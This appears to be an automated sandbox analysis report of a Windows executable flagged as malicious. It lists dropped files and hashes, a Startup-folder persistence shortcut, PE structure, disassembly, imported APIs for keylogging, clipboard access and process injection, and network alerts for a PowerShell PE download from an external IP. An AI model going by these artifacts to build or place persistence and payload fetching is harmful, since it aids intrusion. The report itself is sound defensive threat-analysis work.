| SHA-512: | 094100D8A711F5386FF90734DDFA66CDE270CACF9E6E49438E13C4EFE92EF1A535ABEC200B05C2A1EB49DA6FF79CDF89036C971747D6C0E9E80078A51FF715A8 |
| Malicious: | false |
| Preview: |
| Process: | C:\Users\Public\Guard.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 182 |
| Entropy (8bit): | 4.728787503041443 |
| Encrypted: | false |
| SSDEEP: | 3:RiMIpGXfeNH5E5wWAX+PKMEkD5yKXW/Zi+0/RaMl85uWAX+PKMEkD5yKXW/Zi+oM:RiJbNHCwWDMkDrXW/Zz0tl8wWDMkDrXS |
| MD5: | F3E27756AE384F28A50A26D42047C0C1 |
| SHA1: | 76D4F4BF89EB6DD92C22ACC729A16996FCC42EC7 |
| SHA-256: | 1954E6D6ED7E08C90CFF1BA567C85E15889B9098970DBE5F4979684CAD52130D |
| SHA-512: | C3C157EBEAA16DCA88B3F615674B4474B5A668D2398838A3096C2AFCCE8DC817F46F0D11CEC9E8474410108A445C5F6453E10BE4E1F807E0589D1CB30B405E81 |
| Malicious: | true |
| Preview: |
| Process: | C:\Users\Public\Guard.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 893608 |
| Entropy (8bit): | 6.62028134425878 |
| Encrypted: | false |
| SSDEEP: | 12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501 |
| MD5: | 18CE19B57F43CE0A5AF149C96AECC685 |
| SHA1: | 1BD5CA29FC35FC8AC346F23B155337C5B28BBC36 |
| SHA-256: | D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD |
| SHA-512: | A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558 |
| Malicious: | true |
| Antivirus: |
|
| Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url 
Download File
| Process: | C:\Windows\SysWOW64\cmd.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 97 |
| Entropy (8bit): | 4.913583050357082 |
| Encrypted: | false |
| SSDEEP: | 3:HRAbABGQaFyw3pYoqLTVSRE2J5yKXW/Zi+URAAy:HRYF5yjoqLTwi23yKXW/Zzyy |
| MD5: | B196E358FC1F1A8683B763273B6F2FE2 |
| SHA1: | D494A69C3B14D95E86242085E57527472F30AEB1 |
| SHA-256: | DF5DE160AA2296D525325C499B8E46D179DFD669E4B1BC83324BC04162DF0754 |
| SHA-512: | 4195E5CCA900C5199D9A726795EA0F4AB2BF19FAB8356AD83265EC66157657A23EE3680718DF56E624BFF60036696735714A64FE95872B9B47A55634F0F2C76B |
| Malicious: | true |
| Preview: |
| File type: | |
| Entropy (8bit): | 6.30643452024023 |
| TrID: |
|
| File name: | TCKxnQ5CPn.exe |
| File size: | 1'083'904 bytes |
| MD5: | 2a89603d2620b2a62113513709e38e95 |
| SHA1: | e82753848fbd2e4c993661a80ad11cca2fa73b77 |
| SHA256: | b52b0e15bcdc6b45a70fbf908381b1385b1a84bf6eb2bcfc35cb684b774021f7 |
| SHA512: | 2ad57bcde8d647cf8c7da2fe563ed07f9f51e4d4a61397c459705c95d14ac0f48e95ae49126947bd4a7a8b7fc360a3a336a9bba41111cedda422faf508773e98 |
| SSDEEP: | 24576:xrORE29TTVx8aBRd1h1orq+GWE0Jc5bDTj1Vyv9TvaI1M:x2EYTb8atv1orq+pEiSDTj1VyvBa6 |
| TLSH: | F2357C4973A4419DFEABE1B6CA23C607D6B17C490276861F01A47B767F337712A2E321 |
| File Content Preview: | MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......o1).+PG.+PG.+PG.....>PG......PG......PG.....*PG.y8B..PG.y8C.:PG.y8D.#PG."(..#PG."(..*PG."(...PG.+PF..RG..9I.{PG..9D.*PG..9..*PG |
 | |
| Icon Hash: | 0fd88dc89ea7861b |
| Entrypoint: | 0x14002549c |
| Entrypoint Section: | .text |
| Digitally signed: | false |
| Imagebase: | 0x140000000 |
| Subsystem: | windows gui |
| Image File Characteristics: | EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE |
| DLL Characteristics: | HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE |
| Time Stamp: | 0x676A8A01 [Tue Dec 24 10:16:33 2024 UTC] |
| TLS Callbacks: | |
| CLR (.Net) Version: | |
| OS Version Major: | 5 |
| OS Version Minor: | 2 |
| File Version Major: | 5 |
| File Version Minor: | 2 |
| Subsystem Version Major: | 5 |
| Subsystem Version Minor: | 2 |
| Import Hash: | fadc5a257419d2541a6b13dfb5e311e2 |
| Instruction |
|---|
| dec eax |
| sub esp, 28h |
| call 00007F6BACB0A0A0h |
| dec eax |
| add esp, 28h |
| jmp 00007F6BACB099AFh |
| int3 |
| int3 |
| inc eax |
| push ebx |
| dec eax |
| sub esp, 20h |
| dec eax |
| mov ebx, ecx |
| dec eax |
| mov eax, edx |
| dec eax |
| lea ecx, dword ptr [0009466Dh] |
| dec eax |
| mov dword ptr [ebx], ecx |
| dec eax |
| lea edx, dword ptr [ebx+08h] |
| xor ecx, ecx |
| dec eax |
| mov dword ptr [edx], ecx |
| dec eax |
| mov dword ptr [edx+08h], ecx |
| dec eax |
| lea ecx, dword ptr [eax+08h] |
| call 00007F6BACB0B5B9h |
| dec eax |
| lea eax, dword ptr [0009467Dh] |
| dec eax |
| mov dword ptr [ebx], eax |
| dec eax |
| mov eax, ebx |
| dec eax |
| add esp, 20h |
| pop ebx |
| ret |
| int3 |
| dec eax |
| and dword ptr [ecx+10h], 00000000h |
| dec eax |
| lea eax, dword ptr [00094674h] |
| dec eax |
| mov dword ptr [ecx+08h], eax |
| dec eax |
| lea eax, dword ptr [00094659h] |
| dec eax |
| mov dword ptr [ecx], eax |
| dec eax |
| mov eax, ecx |
| ret |
| int3 |
| int3 |
| inc eax |
| push ebx |
| dec eax |
| sub esp, 20h |
| dec eax |
| mov ebx, ecx |
| dec eax |
| mov eax, edx |
| dec eax |
| lea ecx, dword ptr [0009460Dh] |
| dec eax |
| mov dword ptr [ebx], ecx |
| dec eax |
| lea edx, dword ptr [ebx+08h] |
| xor ecx, ecx |
| dec eax |
| mov dword ptr [edx], ecx |
| dec eax |
| mov dword ptr [edx+08h], ecx |
| dec eax |
| lea ecx, dword ptr [eax+08h] |
| call 00007F6BACB0B559h |
| dec eax |
| lea eax, dword ptr [00094645h] |
| dec eax |
| mov dword ptr [ebx], eax |
| dec eax |
| mov eax, ebx |
| dec eax |
| add esp, 20h |
| pop ebx |
| ret |
| int3 |
| dec eax |
| and dword ptr [ecx+10h], 00000000h |
| dec eax |
| lea eax, dword ptr [0009463Ch] |
| dec eax |
| mov dword ptr [ecx+08h], eax |
| dec eax |
| lea eax, dword ptr [00000021h] |
| Programming Language: |
|
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0xe5c10 | 0x17c | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xfb000 | 0x14114 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0xf4000 | 0x6f48 | .pdata |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x110000 | 0xa74 | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0xc7050 | 0x1c | .rdata |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0xd9aa0 | 0x28 | .rdata |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xc7070 | 0x100 | .rdata |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0xb5000 | 0x1138 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0xb3328 | 0xb3400 | 507a8505198e35cc9675301d53e3b1c4 | False | 0.5503358721234309 | data | 6.5212967575920215 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0xb5000 | 0x34204 | 0x34400 | 9eda36be0cf076085a2f9772c1ee5803 | False | 0.30884139503588515 | data | 5.360588077813426 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0xea000 | 0x9120 | 0x5000 | ec6b77d6ef8898b0d3b7d48c042d66a0 | False | 0.040673828125 | DOS executable (block device driver) | 0.5749243362866429 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .pdata | 0xf4000 | 0x6f48 | 0x7000 | 4416e27f8be9f9271c439d2fd34d1b2d | False | 0.49612862723214285 | data | 5.911479421450324 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .rsrc | 0xfb000 | 0x14114 | 0x14200 | fd46d89329841565eb0ec20cdc242aa0 | False | 0.1937597049689441 | data | 4.245533728497325 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x110000 | 0xa74 | 0xc00 | 5ddb0e422ace102fe530e589a0cbec6f | False | 0.4850260416666667 | data | 5.139847116863034 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_ICON | 0xfb458 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216 |
| RT_ICON | 0xfb580 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027 |
| RT_ICON | 0xfb6a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135 |
| RT_ICON | 0xfb7d0 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 60472 x 60472 px/m | English | Great Britain | 0.14468236129184905 |
| RT_MENU | 0x10bff8 | 0x50 | data | English | Great Britain | 0.9 |
| RT_STRING | 0x10c048 | 0x594 | data | English | Great Britain | 0.3333333333333333 |
| RT_STRING | 0x10c5dc | 0x68a | data | English | Great Britain | 0.2735961768219833 |
| RT_STRING | 0x10cc68 | 0x490 | data | English | Great Britain | 0.3715753424657534 |
| RT_STRING | 0x10d0f8 | 0x5fc | data | English | Great Britain | 0.3087467362924282 |
| RT_STRING | 0x10d6f4 | 0x65c | data | English | Great Britain | 0.34336609336609336 |
| RT_STRING | 0x10dd50 | 0x466 | data | English | Great Britain | 0.3605683836589698 |
| RT_STRING | 0x10e1b8 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186 |
| RT_RCDATA | 0x10e310 | 0x8e6 | data | 1.004828797190518 | ||
| RT_GROUP_ICON | 0x10ebf8 | 0x14 | data | English | Great Britain | 1.25 |
| RT_GROUP_ICON | 0x10ec0c | 0x14 | data | English | Great Britain | 1.25 |
| RT_GROUP_ICON | 0x10ec20 | 0x14 | data | English | Great Britain | 1.15 |
| RT_GROUP_ICON | 0x10ec34 | 0x14 | data | English | Great Britain | 1.25 |
| RT_VERSION | 0x10ec48 | 0xdc | data | English | Great Britain | 0.6181818181818182 |
| RT_MANIFEST | 0x10ed24 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823 |
| DLL | Import |
|---|---|
| WSOCK32.dll | gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect |
| VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW |
| WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW |
| COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create |
| MPR.dll | WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W |
| WININET.dll | HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable |
| PSAPI.DLL | GetProcessMemoryInfo |
| IPHLPAPI.DLL | IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile |
| USERENV.dll | DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile |
| UxTheme.dll | IsThemeActive |
| KERNEL32.dll | WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, GetFullPathNameW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, EnterCriticalSection, DuplicateHandle, GetStdHandle, CreatePipe, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, GetSystemTimeAsFileTime, CreateThread, GetCurrentProcess, GetCurrentThread, LeaveCriticalSection, InitializeSListHead, RtlUnwindEx, RtlPcToFileHeader, SetLastError, TlsAlloc, ResetEvent, WaitForSingleObjectEx, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, CloseHandle, WriteConsoleW, MoveFileW, RtlCaptureContext |
| USER32.dll | GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetWindowLongW, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongPtrW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, SetWindowLongPtrW, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, IsCharUpperW, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, GetClipboardData, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, IsCharLowerW, IsCharAlphaNumericW, IsCharAlphaW, GetKeyboardLayoutNameW, ClientToScreen, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, SetMenuDefaultItem, CloseClipboard, GetWindowRect, SetUserObjectSecurity, IsClipboardFormatAvailable, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, OpenClipboard, GetWindowLongPtrW |
| GDI32.dll | EndPath, DeleteObject, GetDeviceCaps, ExtCreatePen, StrokePath, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, PolyDraw, GetTextExtentPoint32W, CreateCompatibleBitmap, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StretchBlt, SelectObject, CreateCompatibleDC, StrokeAndFillPath |
| COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW |
| ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegSetValueExW, GetSecurityDescriptorDacl, GetAclInformation, RegCreateKeyExW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW, GetUserNameW |
| SHELL32.dll | DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW |
| ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket |
| OLEAUT32.dll | VariantChangeType, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, VariantTimeToSystemTime, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, VariantInit, VariantClear, VariantCopy, SysAllocString, SafeArrayCreateVector, VarR8FromDec, SafeArrayAllocDescriptorEx, SafeArrayAllocData, SysStringLen, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, SysReAllocString, SafeArrayAccessData |
| Language of compilation system | Country where language is spoken | Map |
|---|---|---|
| English | Great Britain |  |
Key Decision
Richest Path
Thread / callback creation
Lower opacity -> Library Node| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-12-27T15:00:50.134198+0100 | 1810000 | Joe Security ANOMALY Windows PowerShell HTTP activity | 1 | 192.168.2.9 | 49707 | 147.45.49.155 | 443 | TCP |
| 2024-12-27T15:00:50.391754+0100 | 1810003 | Joe Security ANOMALY Windows PowerShell HTTP PE File Download | 2 | 147.45.49.155 | 443 | 192.168.2.9 | 49707 | TCP |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Dec 27, 2024 15:00:47.929682016 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:47.929766893 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:47.929830074 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:47.941081047 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:47.941133022 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:49.507101059 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:49.507185936 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:49.510739088 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:49.510751963 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:49.511035919 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:49.518356085 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:49.563330889 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:50.134109020 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:50.182323933 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:50.340058088 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:50.340075970 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:50.340121984 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:50.340137005 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:50.340148926 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:50.340187073 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:50.340214014 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:50.340225935 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:50.340261936 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:50.391779900 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:50.391803980 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:50.391855001 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:50.391868114 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:50.391899109 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:50.391908884 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:50.541273117 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:50.541301966 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:50.541344881 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:50.541356087 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:50.541388035 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:50.541398048 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:50.567090988 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:50.567114115 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:50.567176104 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:50.567187071 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:50.567215919 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:50.567228079 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:50.595065117 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:50.595091105 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:50.595165014 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:50.595174074 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:50.595206976 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:50.595230103 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:50.651823044 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:50.651849031 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:50.652007103 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:50.652021885 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:50.652080059 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:50.743820906 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:50.743844032 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:50.743921995 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:50.743949890 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:50.744101048 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
| Dec 27, 2024 15:00:50.763642073 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:50.763664007 CET | 443 | 49707 | 147.45.49.155 | 192.168.2.9 |
| Dec 27, 2024 15:00:50.763721943 CET | 49707 | 443 | 192.168.2.9 | 147.45.49.155 |
